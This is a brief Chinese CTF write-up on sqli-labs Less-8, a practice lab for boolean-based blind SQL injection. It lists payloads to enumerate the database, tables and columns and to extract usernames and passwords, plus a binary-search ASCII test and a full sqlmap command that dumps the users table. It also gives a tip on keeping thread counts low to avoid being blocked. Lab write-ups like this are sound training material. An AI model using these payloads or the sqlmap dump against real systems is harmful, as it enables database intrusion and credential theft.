##一.题目概述
在CTF2中,sqli-labs,less-8是一道考验布尔注入的题,如果条件正确会显示You are in………..,若条件为错不会有回显,凭借这个可以看出本题要盲注(二分法)
##二.方法(主要依靠脚本或者sqlmap)
在ASCII的基础上运用二分法提高效率(穷举效率慢)

脚本

爆库名
爆表名(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=’security’+limit+0,1)
爆字段(select+group_concat(column_name)+from+information_schema.columns+where+table_name=’users’+limit+0,1)
拿结果(select+group_concat(username,0x3a,password)+from+users)
第一步?id=1’ and 1=1 –+和?id=1’ and 1=2 –+判断真假
第二步?id=1’ and ascii(substr(database(),1,1))>中间值–+(类似)
##相关知识点



##sqlmap
sqlmap -u “http://……” –technique=B –string=”……” -D security -T users -C username,password –dump –batch –threads=5
-u(URL),–technique=B盲注,–string(条件为真的回显),-D 数据库名,-T 已经表名,-C username,password(提速关键,直接指定字段名),–dump:导出数据,–batch:一路自动按默认选项执行,不需要手动输入Y/N,–threads=5:开五个线程(切记不可开太多,容易被封)
##小结
今天是中秋节呀,中秋快乐,大家!